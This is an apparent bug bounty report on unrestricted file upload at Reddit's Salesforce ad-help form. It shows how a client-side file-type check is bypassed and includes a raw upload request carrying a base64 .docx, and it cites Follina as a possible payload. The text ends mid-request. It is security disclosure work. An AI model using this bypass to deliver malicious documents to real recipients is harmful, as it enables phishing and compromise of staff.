Reddit: Unrestricted File Upload on reddit.secure.force.com
Discription

## Summary:
Reddit.secure.force.com is Reddit SalesForce instance. Attacker is able to send attachments of disallowed filetypes to this server. The attacker is able to send malicious documents such as CVE-2022-30190 Follina to the victim.

## Impact:
Attacker can send malicious files to whoever handles the form behind https://reddit.secure.force.com/adhelp

## Steps To Reproduce:
1. Go to https://reddit.secure.force.com/adhelp
2. Notice that the specified allowed filetype is: jpg jpeg gif png pdf as you can see with the image below:

{F1780944}

3. If you try dragging and dropping a docx file to that box, there is a Javascript which forbids such action. But if you used the “Click to browse” option you can start uploading the file.

{F1780957}

4. The file upload request:

“`http
POST /adhelp/apexremote HTTP/1.1
Host: reddit.secure.force.com
????????
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://reddit.secure.force.com/adhelp/
X-User-Agent: Visualforce-Remoting
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 15301
Origin: https://reddit.secure.force.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{“action”:”AdvertisingHelpController”,”method”:”uploadFile”,”data”:[“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”,””,”Dummy 